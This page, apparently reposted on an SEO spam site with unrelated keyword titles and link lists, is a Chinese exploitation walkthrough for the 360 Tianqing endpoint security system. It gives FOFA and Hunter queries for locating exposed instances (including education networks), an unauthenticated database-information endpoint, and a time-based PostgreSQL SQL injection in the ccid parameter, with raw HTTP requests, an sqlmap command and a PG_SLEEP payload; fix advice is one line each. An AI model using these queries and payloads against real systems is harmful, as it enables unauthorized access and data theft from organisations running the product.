当前位置: 首页 > news >正文

新疆建设工程信息官网seo快速推广窍门大公开

新疆建设工程信息官网,seo快速推广窍门大公开,网站公安备案一般什么可以做,外贸公司网站建设费会计科目目录 360天擎 - 未授权与sql注入 信息收集 FOFA语法 鹰图搜索 360天擎未授权访问 - 数据库信息泄露 漏洞复现 修复方案 360天擎终端安全管理系统ccid处SQL注入 漏洞复现 手动测试方法 修复方案 360天擎 - 未授权与sql注入 通常访问的页面如下,存在登录框…

目录

360天擎 - 未授权与sql注入

信息收集

FOFA语法

鹰图搜索

360天擎未授权访问 - 数据库信息泄露

漏洞复现

修复方案

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

手动测试方法

修复方案


360天擎 - 未授权与sql注入

通常访问的页面如下,存在登录框

信息收集

FOFA语法

  1. title="360新天擎"

需重点关注框框的图标,可以聚焦资产搜索

  1. icon_hash="-829652342"

鹰图搜索

这边展现EDUSRC的搜索语法,相对来说资产较少,因为是老洞

  1. web.title="360新天擎"&& ip.isp="教育"

360天擎未授权访问 - 数据库信息泄露

漏洞复现

路由后拼接/api/dbstat/gettablessize

  1. GET /api/dbstat/gettablessize HTTP/1.1
  2. Host: {{Hostname}}

修复方案

未授权更多的是鉴权问题,增加权限校验

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入

路由后拼接/api/dp/rptsvcsyncpoint?ccid=1

  1. GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1
  2. Host: {{Hostname}}

大致页面如下所示

这时候丢到sqlmap中(可能会慢,因为是时间注入)

  1. python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1

手动测试方法

360天擎用的大概率是PostgreSQL,尝试如下时间注入payload,然后注意页面响应时间

  1. {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--

修复方案

SQL注入类问题更多的是需要进行参数预处理

还没看够?可以关注一下呦~

http://www.khdw.cn/news/5506.html

相关文章:

  • 网上做预算有哪些网站通州区网站快速排名方案
  • 新开河街做网站公司百度推广怎么弄
  • 宁德做网站免费b2b网站有哪些
  • 天津网站开发网站沈阳全网推广公司哪家好
  • 国外网站建设企业淘宝关键词怎么选取
  • 如何看网站日志企业网页制作
  • 个人空间网站bt磁力搜索引擎
  • 成品网站nike源码1688免费最新seo网站优化教程
  • 做壁纸的网站业务推广网站
  • 专门做ppt的网站斧头营销知识和技巧
  • 甘肃嘉峪关建设局网站百度推广找谁做
  • 网站建设流程包括哪些内容怎么做推广网络
  • 域名备案做电影网站深圳市龙华区
  • 网站 中国最早做网站的长沙百度网站优化
  • 网站源码是什么电脑培训班在哪里有最近的
  • 做fitting网站网络优化公司哪家好
  • 做棋牌网站违法吗优化搜狗排名
  • 编程网站排名疫情最新动态
  • 可信网站验证服务中心南京 seo 价格
  • 苏州工业园区两学一做网站百度seo排名优化软件分类
  • wordpress 连接丢失.保存已被禁用_直到您重新连接.沧州网站优化公司
  • 深圳易捷网站建设网络营销的特征
  • 阜阳讯拓网站建设公司上海还能推seo吗
  • 淘宝首页网站怎么做手机百度高级搜索
  • 可以搭建分站的网站网站制作软件
  • crm管理系统登录网站优化策略
  • 临海门户网站住房和城乡建设规划局百度关键词热度查询
  • 麻涌做网站网络营销运营推广
  • 做电子商务网站建设工资多少钱谷歌关键词搜索量数据查询
  • 开发公司购买开发公司的房屋如何报税百度seo排名技术必不可少